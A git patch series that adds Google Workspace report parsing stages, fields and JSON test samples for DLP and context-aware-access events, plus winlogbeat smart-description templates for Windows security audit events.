+          google.report.rule.type: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "rule_type" %}{{param.value}}{% endif %}{% endfor %}'
+          google.report.rule.data_source: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "data_source" %}{{param.value}}{% endif %}{% endfor %}'
+          google.report.rule.scan_type: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "scan_type" %}{{param.value}}{% endif %}{% endfor %}'
+          google.report.rule.severity: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "severity" %}{{param.value}}{% endif %}{% endfor %}'
+
+      - set:
+          event.type: ["info"]
+        filter: '{{ json_event.message.events[0].name in ["action_complete", "label_applied", "rule_trigger", "rule_match", "content_matched"]}}'
+
+      - set:
+          event.type: ["deletion"]
+        filter: '{{ json_event.message.events[0].name == "label_removed"}}'
+
+      - set:
+          event.type: ["change"]
+        filter: '{{ json_event.message.events[0].name == "label_field_value_changed"}}'
diff --git a/Google Cloud/google-report/tests/test_rules_sample_1.json b/Google Cloud/google-report/tests/test_rules_sample_1.json
new file mode 100644
index 000000000..3f7ef889b
--- /dev/null
+++ b/Google Cloud/google-report/tests/test_rules_sample_1.json	
@@ -0,0 +1,55 @@
+{
+  "input": {
+    "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-07T14:21:46.270Z\",\"uniqueQualifier\":\"233165468629800000000\",\"applicationName\":\"rules\",\"customerId\":\"C02i38888\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi3fFQ\\\"\",\"actor\":{\"email\":\"john.doe@test.com\",\"profileId\":\"113328670183616666666\"},\"events\":[{\"type\":\"action_complete_type\",\"name\":\"action_complete\",\"parameters\":[{\"name\":\"data_source\",\"value\":\"DRIVE\"},{\"name\":\"resource_id\",\"value\":\"1K23Am8JmHL9vgGwUjUPaq0000000\"},{\"name\":\"resource_owner_email\",\"value\":\"john.doe@test.com\"},{\"name\":\"rule_resource_name\",\"value\":\"policies/aka00000000000\"},{\"name\":\"rule_name\",\"value\":\"DLP [Drive] - D\u00e9tecter le partage de International - Num\u00e9ro IBAN\"},{\"name\":\"rule_type\",\"value\":\"DLP\"},{\"name\":\"matched_detectors\",\"multiMessageValue\":[{\"parameter\":[{\"name\":\"detector_id\",\"value\":\"IBAN_CODE\"},{\"name\":\"detector_type\",\"value\":\"PREDEFINED_DLP\"},{\"name\":\"display_name\",\"value\":\"IBAN_CODE\"}]}]},{\"name\":\"triggered_actions\",\"multiMessageValue\":[{\"parameter\":[{\"name\":\"action_type\",\"value\":\"DRIVE_WARN_ON_EXTERNAL_SHARING\"}]}]},{\"name\":\"resource_recipients\",\"multiValue\":[\"john.doe@test.com\"]},{\"name\":\"scan_type\",\"value\":\"DRIVE_ONLINE_SCAN\"},{\"name\":\"matched_trigger\",\"value\":\"DRIVE_SHARE\"},{\"name\":\"severity\",\"value\":\"LOW\"},{\"name\":\"resource_type\",\"value\":\"DOCUMENT\"},{\"name\":\"resource_title\",\"value\":\"8157822-2024-11-7-15-21-0\"}]}]}",
+    "sekoiaio": {
+      "intake": {
+        "dialect": "Google Report",
+        "dialect_uuid": "04d36706-ee4a-419b-906d-f92f3a46bcdd"
+      }
+    }
+  },
+  "expected": {
+    "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-07T14:21:46.270Z\",\"uniqueQualifier\":\"233165468629800000000\",\"applicationName\":\"rules\",\"customerId\":\"C02i38888\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi3fFQ\\\"\",\"actor\":{\"email\":\"john.doe@test.com\",\"profileId\":\"113328670183616666666\"},\"events\":[{\"type\":\"action_complete_type\",\"name\":\"action_complete\",\"parameters\":[{\"name\":\"data_source\",\"value\":\"DRIVE\"},{\"name\":\"resource_id\",\"value\":\"1K23Am8JmHL9vgGwUjUPaq0000000\"},{\"name\":\"resource_owner_email\",\"value\":\"john.doe@test.com\"},{\"name\":\"rule_resource_name\",\"value\":\"policies/aka00000000000\"},{\"name\":\"rule_name\",\"value\":\"DLP [Drive] - D\u00e9tecter le partage de International - Num\u00e9ro IBAN\"},{\"name\":\"rule_type\",\"value\":\"DLP\"},{\"name\":\"matched_detectors\",\"multiMessageValue\":[{\"parameter\":[{\"name\":\"detector_id\",\"value\":\"IBAN_CODE\"},{\"name\":\"detector_type\",\"value\":\"PREDEFINED_DLP\"},{\"name\":\"display_name\",\"value\":\"IBAN_CODE\"}]}]},{\"name\":\"triggered_actions\",\"multiMessageValue\":[{\"parameter\":[{\"name\":\"action_type\",\"value\":\"DRIVE_WARN_ON_EXTERNAL_SHARING\"}]}]},{\"name\":\"resource_recipients\",\"multiValue\":[\"john.doe@test.com\"]},{\"name\":\"scan_type\",\"value\":\"DRIVE_ONLINE_SCAN\"},{\"name\":\"matched_trigger\",\"value\":\"DRIVE_SHARE\"},{\"name\":\"severity\",\"value\":\"LOW\"},{\"name\":\"resource_type\",\"value\":\"DOCUMENT\"},{\"name\":\"resource_title\",\"value\":\"8157822-2024-11-7-15-21-0\"}]}]}",
+    "event": {
+      "action": "action_complete",
+      "dataset": "admin#reports#activity",
+      "type": [
+        "info"
+      ]
+    },
+    "@timestamp": "2024-11-07T14:21:46.270000Z",
+    "cloud": {
+      "account": {
+        "id": "C02i38888"
+      }
+    },
+    "google": {
+      "report": {
+        "actor": {
+          "email": "john.doe@test.com"
+        },
+        "rule": {
+          "data_source": "DRIVE",
+          "name": "DLP [Drive] - D\u00e9tecter le partage de International - Num\u00e9ro IBAN",
+          "scan_type": "DRIVE_ONLINE_SCAN",
+          "severity": "LOW",
+          "type": "DLP"
+        }
+      }
+    },
+    "network": {
+      "application": "rules"
+    },
+    "related": {
+      "user": [
+        "john.doe"
+      ]
+    },
+    "user": {
+      "domain": "test.com",
+      "email": "john.doe@test.com",
+      "id": "113328670183616666666",
+      "name": "john.doe"
+    }
+  }
+}
\ No newline at end of file
diff --git a/Google Cloud/google-report/tests/test_rules_sample_2.json b/Google Cloud/google-report/tests/test_rules_sample_2.json
new file mode 100644
index 000000000..f7a1e9bf9
--- /dev/null
+++ b/Google Cloud/google-report/tests/test_rules_sample_2.json	
@@ -0,0 +1,55 @@
+{
+  "input": {
+    "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-07T14:21:46.270Z\",\"uniqueQualifier\":\"-49907177521610000000\",\"applicationName\":\"rules\",\"customerId\":\"C02i38888\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi3fFQ/\\\"\",\"actor\":{\"email\":\"john.doe@test.com\",\"profileId\":\"11332867018361686666666\"},\"events\":[{\"type\":\"content_matched_type\",\"name\":\"content_matched\",\"parameters\":[{\"name\":\"data_source\",\"value\":\"DRIVE\"},{\"name\":\"resource_id\",\"value\":\"1K23Am8JmHL9vgGwUjUPaqDZV\"},{\"name\":\"resource_owner_email\",\"value\":\"john.doe@test.com\"},{\"name\":\"rule_resource_name\",\"value\":\"policies/aka000000000\"},{\"name\":\"rule_name\",\"value\":\"DLP [Drive] - D\u00e9tecter le partage de International - Num\u00e9ro IBAN\"},{\"name\":\"rule_type\",\"value\":\"DLP\"},{\"name\":\"matched_detectors\",\"multiMessageValue\":[{\"parameter\":[{\"name\":\"detector_id\",\"value\":\"IBAN_CODE\"},{\"name\":\"detector_type\",\"value\":\"PREDEFINED_DLP\"},{\"name\":\"display_name\",\"value\":\"IBAN_CODE\"}]}]},{\"name\":\"triggered_actions\",\"multiMessageValue\":[{\"parameter\":[{\"name\":\"action_type\",\"value\":\"DRIVE_WARN_ON_EXTERNAL_SHARING\"}]}]},{\"name\":\"resource_recipients\",\"multiValue\":[\"john.doe@test.com\"]},{\"name\":\"scan_type\",\"value\":\"DRIVE_ONLINE_SCAN\"},{\"name\":\"severity\",\"value\":\"LOW\"},{\"name\":\"resource_type\",\"value\":\"DOCUMENT\"},{\"name\":\"resource_title\",\"value\":\"8157822-2024-11-7-15-21-0\"}]}]}",
+    "sekoiaio": {
+      "intake": {
+        "dialect": "Google Report",
+        "dialect_uuid": "04d36706-ee4a-419b-906d-f92f3a46bcdd"
+      }
+    }
+  },
+  "expected": {
+    "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-07T14:21:46.270Z\",\"uniqueQualifier\":\"-49907177521610000000\",\"applicationName\":\"rules\",\"customerId\":\"C02i38888\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi3fFQ/\\\"\",\"actor\":{\"email\":\"john.doe@test.com\",\"profileId\":\"11332867018361686666666\"},\"events\":[{\"type\":\"content_matched_type\",\"name\":\"content_matched\",\"parameters\":[{\"name\":\"data_source\",\"value\":\"DRIVE\"},{\"name\":\"resource_id\",\"value\":\"1K23Am8JmHL9vgGwUjUPaqDZV\"},{\"name\":\"resource_owner_email\",\"value\":\"john.doe@test.com\"},{\"name\":\"rule_resource_name\",\"value\":\"policies/aka000000000\"},{\"name\":\"rule_name\",\"value\":\"DLP [Drive] - D\u00e9tecter le partage de International - Num\u00e9ro IBAN\"},{\"name\":\"rule_type\",\"value\":\"DLP\"},{\"name\":\"matched_detectors\",\"multiMessageValue\":[{\"parameter\":[{\"name\":\"detector_id\",\"value\":\"IBAN_CODE\"},{\"name\":\"detector_type\",\"value\":\"PREDEFINED_DLP\"},{\"name\":\"display_name\",\"value\":\"IBAN_CODE\"}]}]},{\"name\":\"triggered_actions\",\"multiMessageValue\":[{\"parameter\":[{\"name\":\"action_type\",\"value\":\"DRIVE_WARN_ON_EXTERNAL_SHARING\"}]}]},{\"name\":\"resource_recipients\",\"multiValue\":[\"john.doe@test.com\"]},{\"name\":\"scan_type\",\"value\":\"DRIVE_ONLINE_SCAN\"},{\"name\":\"severity\",\"value\":\"LOW\"},{\"name\":\"resource_type\",\"value\":\"DOCUMENT\"},{\"name\":\"resource_title\",\"value\":\"8157822-2024-11-7-15-21-0\"}]}]}",
+    "event": {
+      "action": "content_matched",
+      "dataset": "admin#reports#activity",
+      "type": [
+        "info"
+      ]
+    },
+    "@timestamp": "2024-11-07T14:21:46.270000Z",
+    "cloud": {
+      "account": {
+        "id": "C02i38888"
+      }
+    },
+    "google": {
+      "report": {
+        "actor": {
+          "email": "john.doe@test.com"
+        },
+        "rule": {
+          "data_source": "DRIVE",
+          "name": "DLP [Drive] - D\u00e9tecter le partage de International - Num\u00e9ro IBAN",
+          "scan_type": "DRIVE_ONLINE_SCAN",
+          "severity": "LOW",
+          "type": "DLP"
+        }
+      }
+    },
+    "network": {
+      "application": "rules"
+    },
+    "related": {
+      "user": [
+        "john.doe"
+      ]
+    },
+    "user": {
+      "domain": "test.com",
+      "email": "john.doe@test.com",
+      "id": "11332867018361686666666",
+      "name": "john.doe"
+    }
+  }
+}
\ No newline at end of file

From 8bcde47c77e71b93d99f114695639467987b3d16 Mon Sep 17 00:00:00 2001
From: TOUFIKI Zakarya <zakarya.toufiki@sekoia.io>
Date: Thu, 14 Nov 2024 16:42:34 +0100
Subject: [PATCH 230/317] Add context access service

---
 Google Cloud/google-report/_meta/fields.yml   |  5 ++
 .../_meta/smart-descriptions.json             | 18 ++++++
 Google Cloud/google-report/ingest/parser.yml  | 10 ++++
 .../tests/test_access_sample_1.json           | 58 +++++++++++++++++++
 4 files changed, 91 insertions(+)
 create mode 100644 Google Cloud/google-report/tests/test_access_sample_1.json

diff --git a/Google Cloud/google-report/_meta/fields.yml b/Google Cloud/google-report/_meta/fields.yml
index 84b0db0f6..4fc31cc4b 100644
--- a/Google Cloud/google-report/_meta/fields.yml	
+++ b/Google Cloud/google-report/_meta/fields.yml	
@@ -1,3 +1,8 @@
+google.report.access.application:
+  description: Application name
+  name: google.report.access.application
+  type: keyword
+
 google.report.actor.email:
   description: ''
   name: google.report.actor.email
diff --git a/Google Cloud/google-report/_meta/smart-descriptions.json b/Google Cloud/google-report/_meta/smart-descriptions.json
index 6a934ee3d..51fcc1837 100644
--- a/Google Cloud/google-report/_meta/smart-descriptions.json	
+++ b/Google Cloud/google-report/_meta/smart-descriptions.json	
@@ -168,6 +168,24 @@
       }
     ]
   },
+  {
+    "value": " Access to {google.report.access.application} was denied for {user.email} : {event.action}",
+    "conditions": [
+      {
+        "field": "network.application",
+        "value": "context_aware_access"
+      },
+      {
+        "field": "user.email"
+      },
+      {
+        "field": "event.action"
+      },
+      {
+        "field": "google.report.access.application"
+      }
+    ]
+  },
   {
     "value": "{source.ip} with ID {user.id} changing in the {network.application} application",
     "conditions": [
diff --git a/Google Cloud/google-report/ingest/parser.yml b/Google Cloud/google-report/ingest/parser.yml
index bd5fd0d4e..25f2888b2 100644
--- a/Google Cloud/google-report/ingest/parser.yml	
+++ b/Google Cloud/google-report/ingest/parser.yml	
@@ -1,4 +1,5 @@
 name: google-report
+ignored_values: ["UNKNOWN"]
 pipeline:
   - name: json_event
     external:
@@ -28,6 +29,8 @@ pipeline:
     filter: '{{ json_event.message.id.applicationName == "admin"}}'
   - name: set_vault_fields
     filter: '{{ json_event.message.id.applicationName == "vault"}}'
+  - name: set_context_aware_fields
+    filter: '{{ json_event.message.id.applicationName == "context_aware_access"}}'
   - name: set_parameters_fields
     filter: '{{ json_event.message.events[0].name == "SUSPEND_USER"}}'
 
@@ -258,3 +261,10 @@ stages:
                 {%- endif -%}
             {% endfor %}
             {{ types|unique|list }}
+
+  set_context_aware_fields:
+    actions:
+      - set:
+          event.type: ["denied"]
+          device.id: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "CAA_DEVICE_ID" %}{{param.value}}{% endif %}{% endfor %}'
+          google.report.access.application: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "CAA_APPLICATION" %}{{param.value}}{% endif %}{% endfor %}'
diff --git a/Google Cloud/google-report/tests/test_access_sample_1.json b/Google Cloud/google-report/tests/test_access_sample_1.json
new file mode 100644
index 000000000..e83076db1
--- /dev/null
+++ b/Google Cloud/google-report/tests/test_access_sample_1.json	
@@ -0,0 +1,58 @@
+{
+  "input": {
+    "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-07T14:23:22.470Z\",\"uniqueQualifier\":\"-7203312395540000000\",\"applicationName\":\"context_aware_access\",\"customerId\":\"C02i38lll\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi3fFQ\\\"\",\"actor\":{\"callerType\":\"USER\",\"email\":\"john.doe@test.com\",\"profileId\":\"117564289545555555555\"},\"ipAddress\":\"9.3.2.1\",\"events\":[{\"type\":\"CONTEXT_AWARE_ACCESS_USER_EVENT\",\"name\":\"MONITOR_MODE_ACCESS_DENY_EVENT\",\"parameters\":[{\"name\":\"CAA_ACCESS_LEVEL_APPLIED\",\"multiValue\":[\"is admin-approved IOS\",\"is admin-approved android\",\"Is Corporate Device\"]},{\"name\":\"CAA_ACCESS_LEVEL_UNSATISFIED\",\"multiValue\":[\"is admin-approved android\",\"Crowdstrike Compliant Device\",\"is admin-approved IOS\",\"Is Corporate Device\"]},{\"name\":\"CAA_APPLICATION\",\"value\":\"GMAIL\"},{\"name\":\"BLOCKED_API_ACCESS\",\"multiValue\":[\"GMAIL\"]},{\"name\":\"CAA_DEVICE_ID\",\"value\":\"UNKNOWN\"},{\"name\":\"CAA_DEVICE_STATE\",\"value\":\"No Device Signals\"}]}]}",
+    "sekoiaio": {
+      "intake": {
+        "dialect": "Google Report",
+        "dialect_uuid": "04d36706-ee4a-419b-906d-f92f3a46bcdd"
+      }
+    }
+  },
+  "expected": {
+    "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-07T14:23:22.470Z\",\"uniqueQualifier\":\"-7203312395540000000\",\"applicationName\":\"context_aware_access\",\"customerId\":\"C02i38lll\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi3fFQ\\\"\",\"actor\":{\"callerType\":\"USER\",\"email\":\"john.doe@test.com\",\"profileId\":\"117564289545555555555\"},\"ipAddress\":\"9.3.2.1\",\"events\":[{\"type\":\"CONTEXT_AWARE_ACCESS_USER_EVENT\",\"name\":\"MONITOR_MODE_ACCESS_DENY_EVENT\",\"parameters\":[{\"name\":\"CAA_ACCESS_LEVEL_APPLIED\",\"multiValue\":[\"is admin-approved IOS\",\"is admin-approved android\",\"Is Corporate Device\"]},{\"name\":\"CAA_ACCESS_LEVEL_UNSATISFIED\",\"multiValue\":[\"is admin-approved android\",\"Crowdstrike Compliant Device\",\"is admin-approved IOS\",\"Is Corporate Device\"]},{\"name\":\"CAA_APPLICATION\",\"value\":\"GMAIL\"},{\"name\":\"BLOCKED_API_ACCESS\",\"multiValue\":[\"GMAIL\"]},{\"name\":\"CAA_DEVICE_ID\",\"value\":\"UNKNOWN\"},{\"name\":\"CAA_DEVICE_STATE\",\"value\":\"No Device Signals\"}]}]}",
+    "event": {
+      "action": "MONITOR_MODE_ACCESS_DENY_EVENT",
+      "dataset": "admin#reports#activity",
+      "type": [
+        "denied"
+      ]
+    },
+    "@timestamp": "2024-11-07T14:23:22.470000Z",
+    "cloud": {
+      "account": {
+        "id": "C02i38lll"
+      }
+    },
+    "google": {
+      "report": {
+        "access": {
+          "application": "GMAIL"
+        },
+        "actor": {
+          "email": "john.doe@test.com"
+        }
+      }
+    },
+    "network": {
+      "application": "context_aware_access"
+    },
+    "related": {
+      "ip": [
+        "9.3.2.1"
+      ],
+      "user": [
+        "john.doe"
+      ]
+    },
+    "source": {
+      "address": "9.3.2.1",
+      "ip": "9.3.2.1"
+    },
+    "user": {
+      "domain": "test.com",
+      "email": "john.doe@test.com",
+      "id": "117564289545555555555",
+      "name": "john.doe"
+    }
+  }
+}
\ No newline at end of file

From 4f2e1bfea597d812bf2dcb478bebdc59684e770d Mon Sep 17 00:00:00 2001
From: LenaigKaliou <lenaigk@protonmail.com>
Date: Thu, 14 Nov 2024 16:57:21 +0100
Subject: [PATCH 231/317] Updated smart descriptions

---
 .../winlogbeat/_meta/smart-descriptions.json  | 1129 +++++++++++++++++
 1 file changed, 1129 insertions(+)

diff --git a/Beats/winlogbeat/_meta/smart-descriptions.json b/Beats/winlogbeat/_meta/smart-descriptions.json
index eb6a595a2..5eaf6dc64 100644
--- a/Beats/winlogbeat/_meta/smart-descriptions.json
+++ b/Beats/winlogbeat/_meta/smart-descriptions.json
@@ -1,4 +1,1133 @@
 [
+  {
+    "value": "{action.properties.TargetDomainName}\\{action.properties.TargetUserName} logged on to {host.hostname} (LogonType {action.properties.LogonType})",
+    "relationships": [
+      {
+        "source": "action.properties.TargetUserName",
+        "target": "host.hostname",
+        "type": "logged on to"
+      }
+    ],
+    "conditions": [
+      {
+        "field": "action.id",
+        "value": 4624
+      },
+      {
+        "field": "event.provider",
+        "value": "Microsoft-Windows-Security-Auditing"
+      }
+    ]
+  },
+  {
+    "value": "{action.properties.TargetDomainName}\\{action.properties.TargetUserName} logged on to {host.hostname} from IP {source.ip} (LogonType {action.properties.LogonType})",
+    "relationships": [
+      {
+        "source": "action.properties.TargetUserName",
+        "target": "host.hostname",
+        "type": "logged on to"
+      },
+      {
+        "source": "action.properties.TargetUserName",
+        "target": "source.ip",
+        "type": "connected from"
+      }
+    ],
+    "conditions": [
+      {
+        "field": "action.id",
+        "value": 4624
+      },
+      {
+        "field": "event.provider",
+        "value": "Microsoft-Windows-Security-Auditing"
+      },
+      {
+        "field": "source.ip"
+      }
+    ]
+  },
+  {
+    "value": "{action.properties.TargetUserSid} failed to log on to {host.hostname} (LogonType {action.properties.LogonType})",
+    "relationships": [
+      {
+        "source": "action.properties.TargetUserSid",
+        "target": "host.hostname",
+        "type": "failed to log on to"
+      }
+    ],
+    "conditions": [
+      {
+        "field": "action.id",
+        "value": 4625
+      },
+      {
+        "field": "event.provider",
+        "value": "Microsoft-Windows-Security-Auditing"
+      }
+    ]
+  },
+  {
+    "value": "{action.properties.TargetDomainName}\\{action.properties.TargetUserName} failed to log on to {host.hostname} (LogonType {action.properties.LogonType})",
+    "relationships": [
+      {
+        "source": "action.properties.TargetUserName",
+        "target": "host.hostname",
+        "type": "failed to log on to"
+      }
+    ],
+    "conditions": [
+      {
+        "field": "action.id",
+        "value": 4625
+      },
+      {
+        "field": "event.provider",
+        "value": "Microsoft-Windows-Security-Auditing"
+      }
+    ]
+  },
+  {
+    "value": "{action.properties.TargetDomainName}\\{action.properties.TargetUserName} failed to log on to {host.hostname} from IP {source.ip} (LogonType {action.properties.LogonType})",
+    "relationships": [
+      {
+        "source": "action.properties.TargetUserName",
+        "target": "host.hostname",
+        "type": "failed to log on to"
+      },
+      {
+        "source": "action.properties.TargetUserName",
+        "target": "source.ip",
+        "type": "connected from"
+      }
+    ],
+    "conditions": [
+      {
+        "field": "action.id",
+        "value": 4625
+      },
+      {
+        "field": "event.provider",
+        "value": "Microsoft-Windows-Security-Auditing"
+      },
+      {
+        "field": "source.ip"
+      }
+    ]
+  },
+  {
+    "value": "{action.properties.TargetDomainName}\\{action.properties.TargetUserName} logged off from {host.hostname}",
+    "relationships": [
+      {
+        "source": "action.properties.TargetUserName",
+        "target": "host.hostname",
+        "type": "logged off from"
+      }
+    ],
+    "conditions": [
+      {
+        "field": "action.id",
+        "value": 4634
+      },
+      {
+        "field": "event.provider",
+        "value": "Microsoft-Windows-Security-Auditing"
+      }
+    ]
+  },
+  {
+    "value": "{action.properties.TargetDomainName}\\{action.properties.TargetUserName} attempted to log on to {action.properties.TargetServerName} using explicit credentials",
+    "relationships": [
+      {
+        "source": "action.properties.TargetUserName",
+        "target": "action.properties.TargetServerName",
+        "type": "attempted to log on to"
+      }
+    ],
+    "conditions": [
+      {
+        "field": "action.id",
+        "value": 4648
+      },
+      {
+        "field": "event.provider",
+        "value": "Microsoft-Windows-Security-Auditing"
+      }
+    ]
+  },
+  {
+    "value": "{action.properties.TargetDomainName}\\{action.properties.TargetUserName} attempted to log on to {host.hostname} using explicit credentials",
+    "relationships": [
+      {
+        "source": "action.properties.TargetUserName",
+        "target": "host.hostname",
+        "type": "attempted to log on to"
+      }
+    ],
+    "conditions": [
+      {
+        "field": "action.id",
+        "value": 4648
+      },
+      {
+        "field": "event.provider",
+        "value": "Microsoft-Windows-Security-Auditing"
+      },
+      {
+        "field": "action.properties.TargetServerName",
+        "value": "localhost"
+      }
+    ]
+  },
+  {
+    "value": "{action.properties.SubjectDomainName}\\{action.properties.SubjectUserName} accessed the object {action.properties.ObjectName} on {host.hostname}",
+    "relationships": [
+      {
+        "source": "action.properties.SubjectUserName",
+        "target": "action.properties.ObjectName",
+        "type": "accessed"
+      }
+    ],
+    "conditions": [
+      {
+        "field": "action.id",
+        "value": 4662
+      },
+      {
+        "field": "event.provider",
+        "value": "Microsoft-Windows-Security-Auditing"
+      }
+    ]
+  },
+  {
+    "value": "{user.domain}\\{user.name} logged on to {host.name} with special privileges",
+    "relationships": [
+      {
+        "source": "user.name",
+        "target": "host.name",
+        "type": "logged on to"
+      }
+    ],
+    "conditions": [
+      {
+        "field": "action.id",
+        "value": 4672
+      },
+      {
+        "field": "event.provider",
+        "value": "Microsoft-Windows-Security-Auditing"
+      }
+    ]
+  },
+  {
+    "value": "{action.properties.SubjectDomainName}\\{action.properties.SubjectUserName} logged on to {host.name} with special privileges",
+    "relationships": [
+      {
+        "source": "action.properties.SubjectUserName",
+        "target": "host.name",
+        "type": "logged on to"
+      }
+    ],
+    "conditions": [
+      {
+        "field": "action.id",
+        "value": 4672
+      },
+      {
+        "field": "event.provider",
+        "value": "Microsoft-Windows-Security-Auditing"
+      }
+    ]
+  },
+  {
+    "value": "{user.domain}\\{user.name} executed {process.command_line} on {host.hostname}",
+    "relationships": [
+      {
+        "source": "user.name",
+        "target": "process.command_line",
+        "type": "executed"
+      },
+      {
+        "source": "user.name",
+        "target": "process.parent.executable",
+        "type": "executed"
+      },
+      {
+        "source": "process.command_line",
+        "target": "jost.hostname",
+        "type": "executed on"
+      },
+      {
+        "source": "process.command_line",
+        "target": "process.executable",
+        "type": "uses executable"
+      },
+      {
+        "source": "process.parent.executable",
+        "target": "host.hostname",
+        "type": "executed on"
+      },
+      {
+        "source": "process.parent.executable",
+        "target": "process.command_line",
+        "type": "started"
+      }
+    ],
+    "conditions": [
+      {
+        "field": "action.id",
+        "value": 4688
+      },
+      {
+        "field": "event.provider",
+        "value": "Microsoft-Windows-Security-Auditing"
+      }
+    ]
+  },
+  {
+    "value": "Process {process.name} exited. It was executed by {user.domain}\\{user.name} on {host.name}",
+    "relationships": [
+      {
+        "source": "user.name",
+        "target": "process.executable",
+        "type": "executed"
+      }
+    ],
+    "conditions": [
+      {
+        "field": "action.id",
+        "value": 4689
+      },
+      {
+        "field": "event.provider",
+        "value": "Microsoft-Windows-Security-Auditing"
+      }
+    ]
+  },
+  {
+    "value": "{user.domain}\\{user.name} created account {action.properties.TargetDomainName}\\{action.properties.TargetUserName} on {host.name}",
+    "relationships": [
+      {
+        "source": "user.name",
+        "target": "action.properties.TargetDomainName",
+        "type": "created account"
+      }
+    ],
+    "conditions": [
+      {
+        "field": "action.id",
+        "value": 4720
+      },
+      {
+        "field": "event.provider",
+        "value": "Microsoft-Windows-Security-Auditing"
+      }
+    ]
+  },
+  {
+    "value": "{user.domain}\\{user.name} enabled account {action.properties.TargetDomainName}\\{action.properties.TargetUserName}",
+    "relationships": [
+      {
+        "source": "user.name",
+        "target": "action.properties.TargetDomainName",
+        "type": "enabled account"
+      }
+    ],
+    "conditions": [
+      {
+        "field": "action.id",
+        "value": 4722
+      },
+      {
+        "field": "event.provider",
+        "value": "Microsoft-Windows-Security-Auditing"
+      }
+    ]
+  },
+  {
+    "value": "{user.domain}\\{user.name} changed their password on {host.hostname}",
+    "relationships": [
+      {
+        "source": "user.name",
+        "target": "host.hostname",
+        "type": "changed their password on"
+      }
+    ],
+    "conditions": [
+      {
+        "field": "action.id",
+        "value": 4723
+      },
+      {
+        "field": "event.provider",
+        "value": "Microsoft-Windows-Security-Auditing"
+      },
+      {
+        "field": "action.outcome",
+        "value": "success"
+      }
+    ]
+  },
+  {
+    "value": "{user.domain}\\{user.name} failed to change their password on {host.hostname}",
+    "relationships": [
+      {
+        "source": "user.name",
+        "target": "host.hostname",
+        "type": "failed to change their password on"
+      }
+    ],
+    "conditions": [
+      {
+        "field": "action.id",
+        "value": 4723
+      },
+      {
+        "field": "event.provider",
+        "value": "Microsoft-Windows-Security-Auditing"
+      },
+      {
+        "field": "action.outcome",
+        "value": "failure"
+      }
+    ]
+  },
+  {
+    "value": "{user.domain}\\{user.name} disabled account {action.properties.TargetDomainName}\\{action.properties.TargetUserName}",
+    "relationships": [
+      {
+        "source": "user.name",
+        "target": "action.properties.TargetUserName",
+        "type": "disabled account"
+      }
+    ],
+    "conditions": [
+      {
+        "field": "action.id",
+        "value": 4725
+      },
+      {
+        "field": "event.provider",
+        "value": "Microsoft-Windows-Security-Auditing"
+      }
+    ]
+  },
+  {
+    "value": "{user.domain}\\{user.name} deleted account {action.properties.TargetDomainName}\\{action.properties.TargetUserName} on {host.name}",
+    "relationships": [
+      {
+        "source": "user.name",
+        "target": "action.properties.TargetUserName",
+        "type": "deleted account"
+      }
+    ],
+    "conditions": [
+      {
+        "field": "action.id",
+        "value": 4726
+      },
+      {
+        "field": "event.provider",
+        "value": "Microsoft-Windows-Security-Auditing"
+      }
+    ]
+  },
+  {
+    "value": "{user.domain}\\{user.name} created group {action.properties.TargetDomainName}\\{action.properties.TargetUserName}",
+    "relationships": [
+      {
+        "source": "user.name",
+        "target": "action.properties.TargetUserName",
+        "type": "created group"
+      }
+    ],
+    "conditions": [
+      {
+        "field": "action.id",
+        "value": 4727
+      },
+      {
+        "field": "event.provider",
+        "value": "Microsoft-Windows-Security-Auditing"
+      }
+    ]
+  },
+  {
+    "value": "{user.domain}\\{user.name} effectuated changes about {action.properties.TargetDomainName}\\{action.properties.TargetUserName}",
+    "relationships": [
+      {
+        "source": "user.name",
+        "target": "action.properties.TargetUserName",
+        "type": "effectuated changes about"
+      }
+    ],
+    "conditions": [
+      {
+        "field": "action.id",
+        "value": 4742
+      },
+      {
+        "field": "event.provider",
+        "value": "Microsoft-Windows-Security-Auditing"
+      }
+    ]
+  },
+  {
+    "value": "{user.domain}\\{user.name} created security-disabled local group {action.properties.TargetDomainName}\\{action.properties.TargetUserName}",
+    "relationships": [
+      {
+        "source": "user.name",
+        "target": "action.properties.TargetUserName",
+        "type": "created security-disabled local group"
+      }
+    ],
+    "conditions": [
+      {
+        "field": "action.id",
+        "value": 4744
+      },
+      {
+        "field": "event.provider",
+        "value": "Microsoft-Windows-Security-Auditing"
+      }
+    ]
+  },
+  {
+    "value": "{user.domain}\\{user.name} effectuated changes about the security-disabled global group {action.properties.TargetDomainName}\\{action.properties.TargetUserName}",
+    "relationships": [
+      {
+        "source": "user.name",
+        "target": "action.properties.TargetUserName",
+        "type": "effectuated changes about"
+      }
+    ],
+    "conditions": [
+      {
+        "field": "action.id",
+        "value": 4750
+      },
+      {
+        "field": "event.provider",
+        "value": "Microsoft-Windows-Security-Auditing"
+      }
+    ]
+  },
+  {
+    "value": "{action.properties.TargetDomainName}\\{action.properties.TargetUserName} failed to authenticate from {source.ip} (Error Code: {action.properties.Status})",
+    "relationships": [
+      {
+        "source": "action.properties.TargetUserName",
+        "target": "source.ip",
+        "type": "failed to log authenticate from"
+      }
+    ],
+    "conditions": [
+      {
+        "field": "action.id",
+        "value": 4768
+      },
+      {
+        "field": "event.provider",
+        "value": "Microsoft-Windows-Security-Auditing"
+      }
+    ]
+  },
+  {
